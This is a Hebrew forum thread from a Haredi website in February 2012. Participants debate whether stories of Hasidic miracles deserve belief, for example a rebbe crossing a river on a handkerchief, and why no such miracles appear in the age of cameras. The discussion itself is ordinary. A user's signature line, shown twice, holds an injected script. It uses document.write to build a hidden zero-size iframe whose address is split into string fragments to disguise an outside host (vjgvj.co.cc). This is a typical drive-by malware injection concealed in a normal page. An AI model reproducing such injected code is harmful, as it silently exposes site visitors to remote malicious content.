בית פורומים עצור כאן חושבים

על האימון

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-13/2/2012 21:29 לינק ישיר 

תופעת "סינון" המופתים מוכרת לי מקרוב.

מתעטפים בארשת ביקורתית ומכריזים כי ניתן להאמין רק למופתים "בדוקים" ממקורות "נאמנים".

לקינוח מוסיפים כי המופתים בני זמננו "אמינים" יותר ממופתי התנ"ך. יש בזה משהו. שניהם אמינים באותה מידה, אז כל אחד יכול להחליט מה יותר "אמין".

הטקטיקה ברורה. אם תגיד שאתה מאמין לכל מופת תוכרז כפתי. אם תצליח להציג מצגת של סינון "ביקורתי" ואימוץ מופתים "בדוקים" בלבד, אתה תופס שני ציפורים במכה.

גם מאמין להבלים וגם מתהדר בנוצות חכם.

לא צריך להכיר יותר מדי את העסק כדי להבין איך זה עובד. אנו מספיק קרובים אל החלל כדי לראות בזמן אמת איך הדברים נוצרים.

אין לזה שום קשר לאמינות אישית. בדרך כלל הסיפורים מתגלגלים וכל אחד מוסיף קצת נופך עד שיוצא עגל המופת המושלם.

ובכלל מאימתי נאמנות היא ערובה לאי תמימות ואי אמונה באמונות תפלות?

אדרבה, יסבירו נא לנו מדוע מיום שהביקורתיות התפשטה וכלי ההנצחה השתכללו איננו עדים לשום מופת? (הכוונה למופת חותך, דוגמת הליכה על הנהר. לא לברכות כלליות שחלקן מתגשמות וחלקן לא, כפי מיסת הסטטיסטיקה).

עד כדי כך כוחה של טומאת הטלוויזיה להרבות הסתר פנים?

ומה אפשר להוכיח מכך שהטלוויזיה יכולה לשקר? אדרבה, למרות זאת לא מצליחים לביים מופתים. מה זה אומר?

מעולם לא טענתי שהטלוויזיה אמת ותמונותיה אמתיות.

הטלוויזיה בשילוב דמוקרטיה ותקשורת חופשית ותחרותית, מצמצמת מאד את האפשרות לביים מופתים. זאת עובדה.

ואם נניח שלא, מה הסיבה שבדורנו אף אחד לא יכול להלך על הנהר או משהו דומה לזה? וכי אין זה אומר דרשני?

דדווח על תוכן פוגעני

נשלח ב-13/2/2012 21:33 לינק ישיר 

ייתכן
עדיין לא נתת סיבה רצינית שאני אפסיד את האימון שלי במישהו שהוא דובר אמת, ואחשוב שהוא משקר רק בגלל שסיפר על נס, לבד ההנחה המוחלטת שנסים לא קורים ולא קרו, אך הרי על זה גופא אנו דנים? 

דדווח על תוכן פוגעני

נשלח ב-13/2/2012 21:37 לינק ישיר 

סתם תהיתי האם הסיפור הזה על הבעש"ט- לא מגמד וממזער את נס קריעת ים סוף?

דדווח על תוכן פוגעני

נשלח ב-13/2/2012 21:56 לינק ישיר 

למה משקר?

קצת מדמיין, טיפה נסחף. אתה לא מכיר את זה?

אתה הכרת אישית את הדגל מחנה אפריים?

אינך מכיר ת"ח צדיק וקצת מדומיין?

אתה ראית פעם מופת?

יש סיבה שרק אנשים מסוימים ובעיקר בדורות מסוימים ראו?

אני לא אומר שלא קרו.

אני אומר שאני ואתה לא ראינו.

יש חוקי טבע.

האם אין זה חזקה גדולה שצריך הוכחה חזקה מאד נגדה.

בלי ההנחה הדתית הפוזיטיבית שמופתים מתרחשים, לא היית מאמין.

ולזה צריך הוכחה.

דדווח על תוכן פוגעני

נשלח ב-13/2/2012 22:03 לינק ישיר 

כן אני מכיר את המדמיינים ונספחים, אך זה לא מגיע לקיצוניות כ"כ, ולרוב אם הם אנשים מבינים [פשוט ת"ח] הם מודעים לזה שהם נסחפים. זה אני מכיר אישית. ממילא כשאני רואה למשל הדגמ'א, שהיה ת"ח ויר"ש, לא סביר לי שהוא [או זקנו וכו'] נסחף עד כדי כך. אם אתה רוצה לפרשן את זה קצת, אמרתי שאני מסכים, רק זה עדיין נקרא שאני מאמין לסיפור.

איני מבין איך ההנחה שנסים לא קורים יכול להשפיע על הדיון אם הם קרו. האין זה הנחת המבוקש.
מוסכם שזה נס, כלומר סותר [באיזה אחוז?] את חוקי הטבע, אז אין לנו דרך לוודא את זה אלא באמצעות סיפורי אנשים, עד שלא יקרה הנס לעינינו ממש, ומוסכם שנס זה דבר נדיר.  אז כל השאלה הוא רק אם לתת להם אימון. וזה לא קשור לדת בכלל [אם הייתי מכיר אותם, הייתי מאמין גם לכל מיני מופתים שלא בתוכן הדת שלי או בכלל] מכיוון שהנחתי להאמין, הכי רציונלי שאאמין גם לזה. 

דדווח על תוכן פוגעני

נשלח ב-13/2/2012 22:15 לינק ישיר 

אתה מסכים כי גם כשמאמינים למישהו זה לא גורף.

כתבת מקודם שעל כסף תבקש ערבות.

כגודל החידוש (נס זה חידוש. לא?) כך גודל אי האימון.

מהי היכרותך עם הדגמח"א שאתה כה מאמין למה ששמע בשם זקנו?

בעצם לא הוא נסחף.

הוא פשוט האמין למישהו כמו שאתה מאמין...

דדווח על תוכן פוגעני

נשלח ב-13/2/2012 22:24 לינק ישיר 

על כל השאלות יש תשובה אחת: אימון.

נסים הם אכן חידוש נדיר, אך לכן אמרתי שאני משוכנע שהדגמ'א לא שיקר, לא האמין סתם למי שאין ראוי להאמין לו, וכן הלאה על כל סוג שאלה אחרת שתעלה.  [איני מבין מאי נפק"מ מהי הצד השני, האמון שולל כל אלו כאחד] 

אכן אין לי אימון מוחלט, [אגב לא אמרתי איך אני אנהג בכסף, רק ציינתי תופעה] ולכן אמרתי שניתן לפקפק ולפרשן. אבל בכללות אני מאמין. 

אני מכיר את הדגמ'א מתוך ספרו ומתוך המסורת עליו. 

דדווח על תוכן פוגעני

נשלח ב-13/2/2012 22:28 לינק ישיר 

מה שלי יש הערה, זה שמוכח שכבר אז היו החגורות, כמו המודערנער פאס של היום ללא נקבים, כי אחרת מאי שנא חגורה מנוקבת בחורים מאשר ספינה מנוקבת, אייך לא שקע הפאס.?(זה סתם הלצה)
אבל למה הדגל מחנה אפרים נאמן עליך, דיברת איתו פעם על מה הוא מאמין בסיפורי אגדות ומה לא?, אף אם הוא גאון בפירושים, מי אמר לך מה הוא באמונות, אני מכיר גאונים ממש, שבעניני אמונה הם חיידר קינדער. פשוט לא יאומן, במה שמיתרגלים לחשוב ולחקור מדהים לדבר איתם, אבל כשמגיע לקצת לוגיות, 'יין נסך' ו'שחיטתו נכרי' זה גג ההבנה שלהם.

כדאי לכם ליקרוא הקדמת ר"ח מוולאוז'ין בהקדמת הספרד"צ ביאור הגר"א, תיראו שסיפורי חסידים, יש יותר אצל הליטוויקעס

דדווח על תוכן פוגעני

נשלח ב-13/2/2012 22:40 לינק ישיר 

תו'ד
הכל סברות טובות ויפות, אך התשובה לכולם הוא שיש לי אימון בו. [ומה הקשר ללהאמין באגדות? מדובר במשהו מכלי ראשון, ואני לא חושב שהבעש'ט שיקר]

וכבר סייגתי את האמון כל כך עד שאיני יודע מה נשאר ממנו, בכל אופן הנקודה העקרונית נשארת. 

דדווח על תוכן פוגעני

נשלח ב-13/2/2012 23:04 לינק ישיר 

מיימוני כתב:
צענע

ציטטת אמירה יפה מאד שלא הכרתי כנראה מדברי ייתכן. והיא שעם המצאת טכנולוגיות מעקב שוב אי אפשר לספר סיפורי מופתים כמו בעבר.

הבהרה:מה שהבאתי לא היה ציטוט.
אילו הייתי מצטטת הייתי מוסיפה מרכאות
.

אם תשים לב כתבתי:כמו שכתב יתכן באשכול אחר-כלומר הרעיון הוא שלו אבל המילים הן שלי..

ייתכן כתב ,ולדעתי זו הנקודה החשובה ביותר בעניין אמון/לא אמון בניסים -איך קורה שמאז ההמצאות האלה לא ראינו אדמור ששט על המים על גבי חגורה.
האם אדם סביר ,לפני שהוא מחליט להאמין אינו שואל את עצמו איך קורה שפסו הניסים,פסו השדים ופסו המופתים מהסוג של שיט על פני המים על גבי מטפחת ?????

ועוד מסתבר שמוטיב המטפחת הוא בכלל מוטיב קלסי אפייני של  ניסים (במילים אחרות בובע מעיישעס)(ישו כידוע לא נזקק אפילו למטפחת והוא פשוט הלך על המים...)

זה נכון ולא נכון.

זה נכון שיש אפשרות ביקורת.

אבל זה גם נכון שיש סיפורים חדשים של בדיות. וכפי שניתן לבדוק כך ניתן לבדות ואפילו לזייף ראיות כביכול.

האם אפשר להאמין לצילומים? תלוי מי צילם ומי מעיד.

וכל זה נוגע אך ורק לסיפורים שמהוים הדחיה של חוקי הטבע. ודאי שאין כאן דחיה של סיפורי נס שעומד על שילוב האירועים הנדיר והמשמעותי ולא על תופעה בלתי אפשרית לפי חוקי הטבע המוכרים לנו. כמובן, לא ניתן באותה קלות להביא סיפורים שלא היו ולא נבראו. אבל האם אין זה נכון שדווקא בתקשורת רווחים סיפורים רבים מאי פעם, והמלאכה לברר רבה מאי פעם?

היו דוגמאות רבות לזה בפורום.

לפיכך, דומה שהקביעה של ייתכן היא אופטימית מדי.

(ואם צריך לומר זאת: אני מאד מאד בעד בירור האמת והפלת השקר).

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

לגבי הטענה על השקרים היום בטלוויזיה-ההשוואה מגוחכת.
האם שמעת לאחרונה על  מישהו  שחמישים  צלמים מחמישים  עיתונים  צילמו אותו כשהוא שט על המים על גבי מטפחת?

הדבר לא קרה כי היום אי אפשר לרמות . היום אפשר להצליב מאות אמצעי תקשורת .
יש יוצא מן הכלל אחד-צפון קוריאה .
והיוצא מן הכלל הזה מעיד כאלף עדים על הכלל
.

תוקן על ידי צענערענע ב- 13/02/2012 23:05:09

דדווח על תוכן פוגעני

נשלח ב-14/2/2012 00:05 לינק ישיר 

צענע ויתכן

גם אני שולל, כמעט אפריורי, סיפורי מופתים נוסח "הוא הלך על המים".

אז אל תלינו עלי.

גם אני מבקש ראיות ברורות.

אבל אני מבין מי שיגיד: יש לי מסורת מבית סבא ועליה אני סומך. וכי עליו לזרוק את המסורת שלו על סמך ספקנות של אדם (אמנם חכם ומרשים) שהכיר דרך האינטרנט?

אולי צריך להכיר סבאים.

ירוחם

הביקורת שלך על מעשה הבעשט נאמרה לדעתי בידי רב יוסף על הסיפור על פנחס בן יאיר ונהר גינאי.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-14/2/2012 05:36 לינק ישיר 

לתחושתי, יהי אור מאמין במופת המטפחת והנהר (שאכן מגמד את נס קריעת ים סוף לגודל סיכה
ואם כך, אולי נחבר שירת הנהר או 'ויושע' המטפחת?)
כמו שאנחנו מאמינים בו.
כמו שהוא עצמו אומר, הוא סייג את זה כל כך
עד שמהנהר השוצף נשארה בקושי המטפחת.

ואם נרצה לעשות פה סיכום שמקובל על כולם,
אז הייתי אומרת שהדבר שכבר הכי אפשר להתחבר אליו פה,
יותר מלכל הסבר וראיה אחרת, (ויותר מהאמון לדג"א
 שאין לנו מושג, למרות צדקתו וקדושתו, אם האמין בסיפורי עם לא סבירים או לא,
ששמע שסבו אמר לאי מי,)
זה שכמו שכתב יתכן
עד כדי כך כוחה של טומאת הטלוויזיה להרבות הסתר פנים?
אולי בזה נעוץ הסוד, באמת.
לפני הטלויזיה יכלו לחצות נהר במטפחות חדשות או משומשות,
ובדורנו, מה לעשות, נותרה המטפחת רק מטפחת,
וגם משימוש זה היא הולכת ופוחתת לטובת הטישו.

אגב יש ספור חסידים יפה מאד בעיני
כאשר רבי מנחם מנדל מויטבסק עלה לא"י נדמה לי
או סתם כך הפליג עם תלמידיו ברפסודה בנהר
התפרקה הרפסודה
ומצאו עצמם על קורת עץ אחת מאורכת וצרה
ופחדו
אמר הצדיק:
הרי גם קודם היינו בעצם על קורה זו
אולם חשנו בטחון
כי היתה קורה לימינה וקורה לשמאלה
האם הקב"ה ועזרתו לא שקולים אצלנו כנגד קורה מימין וקורה משמאל?

זה בעיני ספור יפה ומרגש, לא ספור מופת
הוא לא הצביע על נס שקורה להם ברגע ההוא
אלא הצליל את תשומת הלב והמחשבה
שגם כשיש רפסודה, אנו נמצאים למעשה באותו מצב כמו כשנמצאים על קורה אחת,
רק הרגשתנו שונה.
ולמרות זאת, גם ספור זה אינני בטוחה שהיה
כי אינני בטוחה שאפשר אכן להפליג על גבי קורה אחת
אלא אם כן היתה רחבה והמים היו שקטים.
וגם אם היתה רחבה והמים היו שקטים
הספור עדיין יפה ומלמד, כי אינני ספור מופת\נס
אלא ספור הסתכלות בזווית שונה
ונתינת אמון בהשם.
גם מי שאינו מאמין בהשם,
עדיין יכול להנות מהספור בשל ההסתכלות השונה והצלולה על המציאות.
אבל כשמאמינים, זה יותר יפה. הרבה יותר יפה
ואפשר לקחת את זה לחיי היום יום
במצבים שנשמט מאתנו משהו שנתן בטחון
לומר לעצמנו שגם קודם זה רק נתן תחושת בטחון
אבל הבטחון לא היה מדבר זה,
והשם שקול כנגד מה שחשבנו שנתן בטחון
והוא סועדנו מימין ומשמאל, מלמטה ולמעלה.
וגם, בין היתר, בפורום הזה.

דדווח על תוכן פוגעני

נשלח ב-14/2/2012 06:17 לינק ישיר 

לומדת,

הסיפור עם רמ"מ מויטפסק אכן יפה בפשטותו. השאלה היא אם הינו מלמד למעשה משהו. מפני שהדובר בו, האמין כהבעש"ט ותלמידיו בהשגחה פרטית במובנה הקיצוני ביותר. אבל לא כן דעת הרמב"ם למשל, שכידוע מוביל את הנושא למחוזות אחרים לגמרי. הבעיה היא שבנושאים כאלה אין לנו פסק, מי צודק ?

דדווח על תוכן פוגעני

נשלח ב-14/2/2012 07:30 לינק ישיר 

תו'ד
הכל סברות טובות ויפות, אך התשובה לכולם הוא שיש לי אימון בו. [ומה הקשר ללהאמין באגדות? מדובר במשהו מכלי ראשון, ואני לא חושב שהבעש'ט שיקר]

וכבר סייגתי את האמון כל כך עד שאיני יודע מה נשאר ממנו, בכל אופן הנקודה העקרונית נשארת.

http://www.youtube.com/watch?v=2qMI8RKtHgs
ואידך זיל גמור, דרך אגב, את הרעיון של האותיות, שמראה כמה מיסטיקה היה ביהדות אנטי ראציונלי, אפשר לימצוא בנוסח קצת אחר בספר נפש החיים, ומובן איך בריסק מושרשים כבר מזמן ר"ח וולוז'נער בכל הרעיונות האלו. פי"ח
http://hebrewbooks.org/pdfpager.aspx?req=14565&st=&pgnum=68

תישמע אין לי עכשיו זמן בשביל חסידות, כשיפתרו כל הבעיות לפני זה אולי אעסוק גם בזה. בעיקרון אני חושב שיש בחסידות דברים מאוד יפים(כגון השמת דגש יותרעל פנימיות מאשר על חיצוניות ועוד), הקאלטע ליטוויקעס לא בדיוק קלטו מה המסר של החסידים, ומינגד החסידים הראשונים הגזימו לחלוטין בהיתנהגות שלהם(יש ספר של אחד וילנסקי 'מיתנגדים וחסידים', מיסמכים היסטוריים מעניינים) שם לומדים על החוסר תבונה המוחלט שהחסידים ניסו ליכבוש את היהדות, אם יש לכם שיטה יפה וחדשנית, תיתאפקו קצת, תחשבו אסטרטגיית איך להנחילה לרבים, אבל לא היה להם את התבונה הזאת(וגם כל ההתנהגות המוגזמת, כפי שמבואר שם), אולי כי כ"כ היה היתלהבות מהמסר שלה אחרי היובש העצום שהיה נחלת הרוב המוחלט של העם, למעט יושבי מיגדל השן בוילנא שלא קלטו ביכלל מה עובר על העם שבשדות(ממש כשיטת בריסק של היום, לחיות בתוך בועה, ולחשוב שכול השאר הם חלום). אבל לי אישית חוץ ממה שאני אוהב בהם, איין הרבה איתם, ואין לי חשק לעסוק בזה עכשיו.

רק כל הסיפורי שיבחי(בדיוק כמו כל הסיפורי ר"ח מוולוז'ין על המגידים של הגר"א כיעקב אבינו וכו') זה סיפורים מביישים, זה רק מראה איפה היינו תקועים.

הקשר לאגדות זה שיש תופעה (שגם היום עדיין מצויה אצל הספרדים, שדמיון הופך למציאות, קצת הזיות קצת דמיון וקצת ריגושים מיסטיים וכבר המציאות מתחילה להיות נזילה) הבעש"ט או הגר"א אמרו משהו חצי דמיון אישי בחצי פה והדמיון של תלמידיהם כבר השלים הסיפור. ועכשיו כל הכופר בשטויות האלו ככופר בעיקר רח"ל.

דדווח על תוכן פוגעני

נשלח ב-14/2/2012 09:52 לינק ישיר 

מיימוני כתב:
צענע ויתכן

גם אני שולל, כמעט אפריורי, סיפורי מופתים נוסח "הוא הלך על המים".

אז אל תלינו עלי.

גם אני מבקש ראיות ברורות.

אבל אני מבין מי שיגיד: יש לי מסורת מבית סבא ועליה אני סומך. וכי עליו לזרוק את המסורת שלו על סמך ספקנות של אדם (אמנם חכם ומרשים) שהכיר דרך האינטרנט?

אולי צריך להכיר סבאים.

ירוחם

הביקורת שלך על מעשה הבעשט נאמרה לדעתי בידי רב יוסף על הסיפור על פנחס בן יאיר ונהר גינאי.

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

לא שעליו לזרוק את המסורת שלו על סמך ספקנות של אדם,כפי שכתבת בטעות.
האם שפינוזה השליך את המסורת בגלל שהסתמך על ספקנות של אדם אחר שפגש במקרה או לא במקרה?
לא.
הוא השתכנע מהתבוננות אישית בדברים וגם מטיעונים שקרא או ששמע .

כלומר מדובר בטיעונים ולא באנשים.

עדיין לא שמעתי טיעון נגד רציני על הטענה שפסו הניסים מיום המצאת  המצלמות המאפשרות הצלבת מידע.
כלומר "אנן יתמי דיתמי"-התיתמנו דווקא ביום המצאת המכשיר הטכנולוגי המאיים-האם אדם סביר יגיד שאין כל קשר בין שתי התופעות?

ולגבי דבריך:"אולי צריך להכיר סבאים"

כאשר יהיאור בעז"ה ייהפך לסבא ויספר לנכדו החכם על המופתים והניסים של הבעש"ט מעניין איזה תשובה הוא יספק לנכדו  כשישאל אותו:

אז איך קרה,סבי היקר,שאתה בעצמך לא ראית מופת בעיניך? האם קרה משהו בדורך שבגללו  פסו המופתים,נעלמו הנפלאות?

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > על האימון
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 5 לדף הבא סך הכל 5 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.